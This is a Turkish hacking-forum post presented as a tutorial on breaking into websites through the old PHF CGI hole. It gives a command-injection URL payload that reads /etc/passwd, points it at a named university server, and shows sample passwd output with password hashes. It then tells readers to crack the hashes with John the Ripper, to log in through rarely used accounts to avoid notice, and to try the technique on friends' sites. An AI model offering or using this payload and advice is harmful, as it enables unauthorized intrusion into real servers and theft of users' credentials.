Web Sİtesİ ÇÖkertme AÇiklamali

msn adamı

Üye
10 Ara 2006
122
2
WEB HACK UZERINE

WEB HACK NEDIR???

WEB hacking bilgidim kadari ile ilk kez 1996 da FBI in web sitesini hack etmek icin kullanilmis ve basarili olmustur. Tabi bu durum dan sonra FBI bu hatasini gidermistir. Anlatacagim teknik aslinda PHF olarak bilinir.Fakat bir cok eski server da hala uygulanmakta ve netice alinabilmektedir ozellikle japon webcilerinde bu hataya cok rastlanilir ornek vermek gerekirse:

http://www.mo.cs.tutsiki.ac.jp/cgi-b...%20/etc/passwd

Satirini browserinize yazip enter e basin bu satir passwd dosyasini acmaya calisacaktir(adresi attim)

Error 404

/cgi-bin/phf is not found on this server

Bu satirlar karsiniza cikarsa bilinki server yeni ve size gecit vermiyor

Ama asagidaki listeyi verirse bilinki buldunuz
smile.gif
))

/cgi/phf?Qalias=x%0a/bin/cat%20/etc/passwd

root:2fkbNba29uWys:0:1:Operator:/:/bin/csh

www-admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/WWW:/bin/csh

asprilla:3A62i9qr.YmO.:1012:10:kafka

CAFER:/home/user/asprilla:/usr/local/bin/tcsh

hasan:dvUMqNmeeENFs:1016:10:lois figo:/home/user/hasan:/bin/csh

necmettin:ewF90K0gwXVD6:1006:10:mehmet CAFER:/home/user/cafer:/bin/csh

güloglu:kFph8HEM/aaAA:1007:10:Kemal GULOGLU:/home/user/güloglu:/bin/csh

PHF teknigini arkadaslarinizin web page larini hack etmek icin deniye bilirsiniz
smile.gif
)) tabi yukardaki satirlari en iyi ihtimali goz onune alinarak yazdim PHF bulsaniz bile muhtemelen shadow olacaktir yani asagidaki gibi:

root:*:0:1:Operator:/:/bin/csh

www-admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh

asprilla:*:1012:10:CAFER:/home/user/asprilla:/usr/local/bin/tcsh

hasan:*:1016:10:lois figo:/home/user/hasan:/bin/csh

necmettin:*:1006:10:mehmet CAFER:/home/user/cafer:/bin/csh

güloglu:*:1007:10:kemal GULOGLU:/home/user/güloglu:/bin/csh

Bu tek * sifreleri kirdigini iddia eden bazi programlar var ama ben sadece guluyorum shadowed kirmak bence imkansiz ama yinede john the ripper i cekip deneyebilirsiniz.Hic bir teknik % 100 netice vermez bunu unutmayin.olaki bir shell aldiniz veya kirdiniz diyelim en az kullanilanini kullanin en son ne zaman kullanildigini anlamak icin shell in ait oldugu servere port 79 dan baglanin username ve pw i yazin en son baglanilan tarihi size verir az kullanilan accountlari kullanin.

NOT: ARKADAŞLAR FORUMA KOYDUGUM KONULARIN ÇOGU ALINTIDIR HABERİNİZ OLSUN
BU KONU KARTAL137 TARAFINDAN HAZIRLANMIŞTIR

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.